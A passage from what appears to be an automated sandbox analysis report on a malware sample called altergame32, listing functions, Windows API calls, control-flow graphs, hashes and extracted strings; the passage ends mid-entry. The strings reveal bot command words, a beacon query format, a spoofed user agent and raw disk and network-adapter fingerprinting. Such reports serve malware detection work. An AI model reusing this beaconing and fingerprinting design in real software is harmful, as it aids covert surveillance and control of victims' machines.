                                                                  • _sprintf.LIBCMT ref: 02E47822
                                                                  • RtlEnterCriticalSection.NTDLL(00000020), ref: 02E478E6
                                                                  • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02E4791A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                  • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                  • API String ID: 1657546717-1839899575
                                                                  • Opcode ID: 42e35dc443596ecd6ad8ef919a29b4e1970f0625e71b35eef4f40a1d59952da9
                                                                  • Instruction ID: a03bde155487a412312432de5e9e2afb080eb0ff69cd5294aab116e92ea4f81b
                                                                  • Opcode Fuzzy Hash: 42e35dc443596ecd6ad8ef919a29b4e1970f0625e71b35eef4f40a1d59952da9
                                                                  • Instruction Fuzzy Hash: 123227316C8381AFE7349B20EC05BAFB7E5AF85358F10981DF98997291DF709544CB62
                                                                  Function 02E4648B Relevance: 68.5, APIs: 34, Strings: 5, Instructions: 228memorysleeplibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlInitializeCriticalSection.NTDLL(02E771E0), ref: 02E464BA
                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02E464D1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02E464DA
                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02E464E9
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02E464EC
                                                                  • GetTickCount.KERNEL32 ref: 02E464F8
                                                                    • Part of subcall function 02E4605A: _malloc.LIBCMT ref: 02E46068
                                                                  • GetVersionExA.KERNEL32(02E77038), ref: 02E46525
                                                                  • _malloc.LIBCMT ref: 02E46551
                                                                    • Part of subcall function 02E52FAC: __FF_MSGBANNER.LIBCMT ref: 02E52FC3
                                                                    • Part of subcall function 02E52FAC: __NMSG_WRITE.LIBCMT ref: 02E52FCA
                                                                    • Part of subcall function 02E52FAC: RtlAllocateHeap.NTDLL(009A0000,00000000,00000001), ref: 02E52FEF
                                                                  • _malloc.LIBCMT ref: 02E46561
                                                                  • _malloc.LIBCMT ref: 02E4656C
                                                                  • _malloc.LIBCMT ref: 02E46577
                                                                  • _malloc.LIBCMT ref: 02E46582
                                                                  • _malloc.LIBCMT ref: 02E4658D
                                                                  • _malloc.LIBCMT ref: 02E46598
                                                                  • _malloc.LIBCMT ref: 02E465A7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02E465BE
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02E465C7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E465D6
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02E465D9
                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E465E4
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02E465E7
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46621
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E4662E
                                                                  • _malloc.LIBCMT ref: 02E46652
                                                                  • _malloc.LIBCMT ref: 02E46660
                                                                  • _malloc.LIBCMT ref: 02E46667
                                                                  • _malloc.LIBCMT ref: 02E4668D
                                                                  • QueryPerformanceCounter.KERNEL32(00000200), ref: 02E466A0
                                                                  • Sleep.KERNEL32 ref: 02E466AE
                                                                  • _malloc.LIBCMT ref: 02E466BA
                                                                  • _malloc.LIBCMT ref: 02E466C7
                                                                  • Sleep.KERNEL32(0000EA60), ref: 02E46708
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46713
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E46724
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                  • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                  • API String ID: 4273019447-2678694477
                                                                  • Opcode ID: c52bd01b55966f7e9b654e894a46df5ab2fb98f3df0cb0b09d0718842d6e26cd
                                                                  • Instruction ID: a856da462a43256485e634bcdccd6c55e9e6e98f20e641d6fd0e334641219c23
                                                                  • Opcode Fuzzy Hash: c52bd01b55966f7e9b654e894a46df5ab2fb98f3df0cb0b09d0718842d6e26cd
                                                                  • Instruction Fuzzy Hash: F071E871DD8350AFE710AF31AC09B5BBBE8EF85354F049819FA4497281DBB45840CFA6
                                                                  Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 376 401b4b-401b68 LoadLibraryA 377 401c21-401c25 376->377 378 401b6e-401b7f GetProcAddress 376->378 379 401b85-401b8e 378->379 380 401c18-401c1b FreeLibrary 378->380 381 401b95-401ba5 GetAdaptersInfo 379->381 380->377 382 401ba7-401bb0 381->382 383 401bdb-401be3 381->383 384 401bc1-401bd7 call 403120 call 4018cc 382->384 385 401bb2-401bb6 382->385 386 401be5-401beb call 403106 383->386 387 401bec-401bf0 383->387 384->383 385->383 391 401bb8-401bbf 385->391 386->387 389 401bf2-401bf6 387->389 390 401c15-401c17 387->390 389->390 394 401bf8-401bfb 389->394 390->380 391->384 391->385 396 401c06-401c13 call 4030f8 394->396 397 401bfd-401c03 394->397 396->381 396->390 397->396
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                  • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                  • API String ID: 514930453-3667123677
                                                                  • Opcode ID: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                  • Instruction ID: a9f54c968f2091474e8feb0d981771773be25d9c6ef5ebc30493122ab1168d3f
                                                                  • Opcode Fuzzy Hash: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                  • Instruction Fuzzy Hash: E821B870904209AEDF219F65C9447EF7FB8EF45345F0440BAE604B62A1E7389A85CB69
                                                                  Function 02E4F9A6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 489 2e4f9a6-2e4f9c9 LoadLibraryA 490 2e4f9cf-2e4f9dd GetProcAddress 489->490 491 2e4fa89-2e4fa90 489->491 492 2e4fa82-2e4fa83 FreeLibrary 490->492 493 2e4f9e3-2e4f9f3 490->493 492->491 494 2e4f9f5-2e4fa01 GetAdaptersInfo 493->494 495 2e4fa03 494->495 496 2e4fa39-2e4fa41 494->496 499 2e4fa05-2e4fa0c 495->499 497 2e4fa43-2e4fa49 call 2e537a8 496->497 498 2e4fa4a-2e4fa4f 496->498 497->498 501 2e4fa51-2e4fa54 498->501 502 2e4fa7d-2e4fa81 498->502 503 2e4fa16-2e4fa1e 499->503 504 2e4fa0e-2e4fa12 499->504 501->502 506 2e4fa56-2e4fa5b 501->506 502->492 508 2e4fa21-2e4fa26 503->508 504->499 507 2e4fa14 504->507 509 2e4fa5d-2e4fa65 506->509 510 2e4fa68-2e4fa73 call 2e53b4c 506->510 507->496 508->508 511 2e4fa28-2e4fa35 call 2e4f6f5 508->511 509->510 510->502 516 2e4fa75-2e4fa78 510->516 511->496 516->494
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02E4F9BC
                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02E4F9D5
                                                                  • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02E4F9FA
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02E4FA83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                  • API String ID: 514930453-3114217049
                                                                  • Opcode ID: 765b12ab7b5d43115f7e59b00d31b058b0941b1222fa93f6c2ea8d7f06c28695
                                                                  • Instruction ID: fb02a44fa078425be4adc0e655e48e3f9fc750405569390d3841981f54faed03
                                                                  • Opcode Fuzzy Hash: 765b12ab7b5d43115f7e59b00d31b058b0941b1222fa93f6c2ea8d7f06c28695
                                                                  • Instruction Fuzzy Hash: BB21D731E802099FDF10CFA9A8446EEBBF9EF05748F1491AAD405E7610DF308945CBA0
                                                                  Function 02E4F8A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 574 2e4f8a2-2e4f8cd CreateFileA 575 2e4f8d3-2e4f8e8 574->575 576 2e4f99e-2e4f9a5 574->576 577 2e4f8eb-2e4f90d DeviceIoControl 575->577 578 2e4f946-2e4f94e 577->578 579 2e4f90f-2e4f917 577->579 582 2e4f957-2e4f959 578->582 583 2e4f950-2e4f956 call 2e537a8 578->583 580 2e4f920-2e4f925 579->580 581 2e4f919-2e4f91e 579->581 580->578 587 2e4f927-2e4f92f 580->587 581->578 585 2e4f994-2e4f99d CloseHandle 582->585 586 2e4f95b-2e4f95e 582->586 583->582 585->576 589 2e4f960-2e4f969 GetLastError 586->589 590 2e4f97a-2e4f987 call 2e53b4c 586->590 591 2e4f932-2e4f937 587->591 589->585 592 2e4f96b-2e4f96e 589->592 590->585 598 2e4f989-2e4f98f 590->598 591->591 594 2e4f939-2e4f945 call 2e4f6f5 591->594 592->590 595 2e4f970-2e4f977 592->595 594->578 595->590 598->577
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02E4F8C1
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02E4F8FF
                                                                  • GetLastError.KERNEL32 ref: 02E4F960
                                                                  • CloseHandle.KERNEL32(?), ref: 02E4F997
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                  • String ID: \\.\PhysicalDrive0
                                                                  • API String ID: 4026078076-1180397377
                                                                  • Opcode ID: 194707ef53f16e761ca43085f5e57597237e9287fca48b3f0d0a2bf0e40745d9
                                                                  • Instruction ID: 2840af3d0c5dddb18e9a52857f628382dc4c0cbc4f92be5f72d347e8161c7bf5
                                                                  • Opcode Fuzzy Hash: 194707ef53f16e761ca43085f5e57597237e9287fca48b3f0d0a2bf0e40745d9
                                                                  • Instruction Fuzzy Hash: 98318471D80219BBDB14CFD9E884BAFBBB5EB48B58F109169E605A7640DB705A00CB90
                                                                  Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 600 401a4f-401a77 CreateFileA 601 401b45-401b4a 600->601 602 401a7d-401a91 600->602 603 401a98-401ac0 DeviceIoControl 602->603 604 401ac2-401aca 603->604 605 401af3-401afb 603->605 606 401ad4-401ad9 604->606 607 401acc-401ad2 604->607 608 401b04-401b07 605->608 609 401afd-401b03 call 403106 605->609 606->605 612 401adb-401af1 call 403120 call 4018cc 606->612 607->605 610 401b09-401b0c 608->610 611 401b3a-401b44 CloseHandle 608->611 609->608 614 401b27-401b34 call 4030f8 610->614 615 401b0e-401b17 GetLastError 610->615 611->601 612->605 614->603 614->611 615->611 618 401b19-401b1c 615->618 618->614 621 401b1e-401b24 618->621 621->614
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                  • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                  • GetLastError.KERNEL32 ref: 00401B0E
                                                                  • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                  • String ID: \\.\PhysicalDrive0
                                                                  • API String ID: 4026078076-1180397377
                                                                  • Opcode ID: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                                  • Instruction ID: ae54cd8959710a424601ffd4623f532e2396a469a493930b182490efebea7a61
                                                                  • Opcode Fuzzy Hash: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                                  • Instruction Fuzzy Hash: 50318D71D01118EECB21EF95CD809EFBBB8EF45750F20807AE514B22A0E7785E45CB98
                                                                  Function 02E41CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02E41D11
                                                                  • GetLastError.KERNEL32 ref: 02E41D23
                                                                    • Part of subcall function 02E41712: __EH_prolog.LIBCMT ref: 02E41717
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02E41D59
                                                                  • GetLastError.KERNEL32 ref: 02E41D6B
                                                                  • __beginthreadex.LIBCMT ref: 02E41DB1
                                                                  • GetLastError.KERNEL32 ref: 02E41DC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 02E41DDD
                                                                  • CloseHandle.KERNEL32(00000000), ref: 02E41DEC
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02E41E14
                                                                  • CloseHandle.KERNEL32(00000000), ref: 02E41E1B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                  • String ID: thread$thread.entry_event$thread.exit_event
                                                                  • API String ID: 831262434-3017686385
                                                                  • Opcode ID: a7c75c75d032b570041bc9956f8178c58e374c2811fffe287285053672cd08d0
                                                                  • Instruction ID: 21a88c246771498d2201a41e8c233c33ccdcb9436f4ea36948bff333a92ccfe5
                                                                  • Opcode Fuzzy Hash: a7c75c75d032b570041bc9956f8178c58e374c2811fffe287285053672cd08d0
                                                                  • Instruction Fuzzy Hash: F031A071A843009FDB00EF20D848B2BBBE5EB85358F10995DF9598B290DB709C85CF92
                                                                  Function 02E44D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E44D8B
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E44DB7
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E44DC3
                                                                    • Part of subcall function 02E44BED: __EH_prolog.LIBCMT ref: 02E44BF2
                                                                    • Part of subcall function 02E44BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02E44CF2
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E44E93
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E44E99
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E44EA0
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E44EA6
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E450A7
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E450AD
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E450B8
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E450C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 2062355503-0
                                                                  • Opcode ID: 47e0fa3be40f0f9059068da3f0e9cb50f0aa35bce6a75a7dad3ca978f8c10377
                                                                  • Instruction ID: 239d19ecfdebcc6568642875473ef46fe90392a1d32a451cc181b96df39e5979
                                                                  • Opcode Fuzzy Hash: 47e0fa3be40f0f9059068da3f0e9cb50f0aa35bce6a75a7dad3ca978f8c10377
                                                                  • Instruction Fuzzy Hash: EEB13B71D8025EDFDF21DF90D844BEEBBB5AF14318F24905AE4056A280DBB46A49CFA1
                                                                  Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 402 401f64-401f84 FindResourceA 403 401f86-401f9d GetLastError SizeofResource 402->403 404 401f9f-401fa1 402->404 403->404 405 401fa6-401fec LoadResource LockResource GlobalAlloc call 402d60 * 2 403->405 406 402096-40209a 404->406 411 401fee-401ff9 405->411 411->411 412 401ffb-402003 GetTickCount 411->412 413 402032-402038 412->413 414 402005-402007 412->414 415 402053-402083 GlobalAlloc call 401c26 413->415 417 40203a-40204a 413->417 414->415 416 402009-40200f 414->416 424 402088-402093 415->424 416->415 418 402011-402023 416->418 419 40204c 417->419 420 40204e-402051 417->420 422 402025 418->422 423 402027-40202a 418->423 419->420 420->415 420->417 422->423 423->418 425 40202c-40202e 423->425 424->406 425->416 426 402030 425->426 426->415
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                  • GetLastError.KERNEL32 ref: 00401F86
                                                                  • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                  • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                  • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                  • GetTickCount.KERNEL32 ref: 00401FFB
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                  • String ID:
                                                                  • API String ID: 564119183-0
                                                                  • Opcode ID: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                                  • Instruction ID: b01298f5e92dfabffd3260d40ec81ee59ee3d80feb476c4020a7475af27d6630
                                                                  • Opcode Fuzzy Hash: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                                  • Instruction Fuzzy Hash: 60315C32900255EFDB105FB89F8896F7B68EF45344B10807AFA86F7281DA748941C7A8
                                                                  Function 02E47B86 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 122sleepCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 427 2e47b86-2e47b8c 428 2e47b1c-2e47b2d 427->428 429 2e47b8e-2e47b9b 427->429 432 2e47b33-2e47b46 call 2e4439c 428->432 433 2e47b2e call 2e54af0 428->433 430 2e47b9d-2e47ba2 429->430 431 2e47bce-2e47c01 429->431 434 2e47ba4-2e47ba7 430->434 436 2e47c04-2e47c09 431->436 442 2e47b4f-2e47b56 call 2e52f74 432->442 443 2e47b48-2e47b4a call 2e4534d 432->443 433->432 434->436 437 2e47ba9-2e47bb9 434->437 439 2e47bcc-2e47bcd 436->439 440 2e47c0b-2e47c11 436->440 437->434 441 2e47bbb-2e47bc8 437->441 439->431 444 2e47b54-2e47b56 441->444 445 2e47bca 441->445 449 2e466f4-2e466f6 442->449 443->442 444->449 445->439 450 2e466ff-2e46701 449->450 451 2e466f8-2e466fd 449->451 453 2e46703 450->453 454 2e4670e-2e46742 RtlEnterCriticalSection RtlLeaveCriticalSection 450->454 452 2e46708 Sleep 451->452 452->454 453->452 455 2e46744-2e46750 454->455 456 2e46792 454->456 455->456 457 2e46752-2e4675f 455->457 458 2e46796 456->458 459 2e46767-2e46768 457->459 460 2e46761-2e46765 457->460 461 2e4676c-2e46790 call 2e54af0 * 2 459->461 460->461 461->458
                                                                  APIs
                                                                  • Sleep.KERNEL32(0000EA60), ref: 02E46708
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46713
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E46724
                                                                  • _free.LIBCMT ref: 02E47B50
                                                                  Strings
                                                                  • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02E46739
                                                                  • urls, xrefs: 02E47B36
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeaveSleep_free
                                                                  • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                                  • API String ID: 2653569029-4235545730
                                                                  • Opcode ID: e7f3bff4b5712a74cb6235f271395b0e7c78fd613fde1c2df26557e930c97a35
                                                                  • Instruction ID: 881fb41df40644766787464cf572f052de750be5dcef291e5f1b9ce73dd7c5d7
                                                                  • Opcode Fuzzy Hash: e7f3bff4b5712a74cb6235f271395b0e7c78fd613fde1c2df26557e930c97a35
                                                                  • Instruction Fuzzy Hash: A441CA729C8391AFDB119F20A80479BBBA2EF46358F14E898E5C19B242DB615402C796
                                                                  Function 02E426DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02E42706
                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02E4272B
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E65B53), ref: 02E42738
                                                                    • Part of subcall function 02E41712: __EH_prolog.LIBCMT ref: 02E41717
                                                                  • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02E42778
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02E427D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                  • String ID: timer
                                                                  • API String ID: 4293676635-1792073242
                                                                  • Opcode ID: df1786c243e440fa8bd4d01561b84234e9737530cebfd779695d10a798a9215b
                                                                  • Instruction ID: 1f6bd7d507401224fa28bf401c6e11d2d083289352c1c3d8cff48b53d6b93dbe
                                                                  • Opcode Fuzzy Hash: df1786c243e440fa8bd4d01561b84234e9737530cebfd779695d10a798a9215b
                                                                  • Instruction Fuzzy Hash: 8D319EB1984705AFD310DF25D948B66BBE8FB48768F009A2EF95586680DB70E840CFA5
                                                                  Function 02E42B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 517 2e42b95-2e42baf 518 2e42bc7-2e42bcb 517->518 519 2e42bb1-2e42bb9 call 2e50b10 517->519 521 2e42bcd-2e42bd0 518->521 522 2e42bdf 518->522 526 2e42bbf-2e42bc2 519->526 521->522 524 2e42bd2-2e42bdd call 2e50b10 521->524 525 2e42be2-2e42c11 WSASetLastError WSARecv call 2e4a508 522->525 524->526 531 2e42c16-2e42c1d 525->531 529 2e42d30 526->529 532 2e42d32-2e42d38 529->532 533 2e42c2c-2e42c32 531->533 534 2e42c1f-2e42c2a call 2e50b10 531->534 536 2e42c34-2e42c39 call 2e50b10 533->536 537 2e42c46-2e42c48 533->537 542 2e42c3f-2e42c42 534->542 536->542 540 2e42c4f-2e42c60 call 2e50b10 537->540 541 2e42c4a-2e42c4d 537->541 540->532 544 2e42c66-2e42c69 540->544 541->544 542->537 547 2e42c73-2e42c76 544->547 548 2e42c6b-2e42c6d 544->548 547->529 550 2e42c7c-2e42c9a call 2e50b10 call 2e4166f 547->550 548->547 549 2e42d22-2e42d2d call 2e41996 548->549 549->529 557 2e42cbc-2e42cfa WSASetLastError select call 2e4a508 550->557 558 2e42c9c-2e42cba call 2e50b10 call 2e4166f 550->558 564 2e42cfc-2e42d06 call 2e50b10 557->564 565 2e42d08 557->565 558->529 558->557 571 2e42d19-2e42d1d 564->571 566 2e42d15-2e42d17 565->566 567 2e42d0a-2e42d12 call 2e50b10 565->567 566->529 566->571 567->566 571->525
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42BE4
                                                                  • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02E42C07
                                                                    • Part of subcall function 02E4A508: WSAGetLastError.WS2_32(00000000,?,?,02E42A51), ref: 02E4A516
                                                                  • WSASetLastError.WS2_32 ref: 02E42CD3
                                                                  • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02E42CE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Recvselect
                                                                  • String ID: 3'
                                                                  • API String ID: 886190287-280543908
                                                                  • Opcode ID: 354bc48a34f644291532efbc8da93efbed7fe71c52b13d9e56046722de9c0652
                                                                  • Instruction ID: 48238c2f9e6b6b385ce4a4a8a4a18b4cc24314c6fdff98ed477bdc67b74b9d54
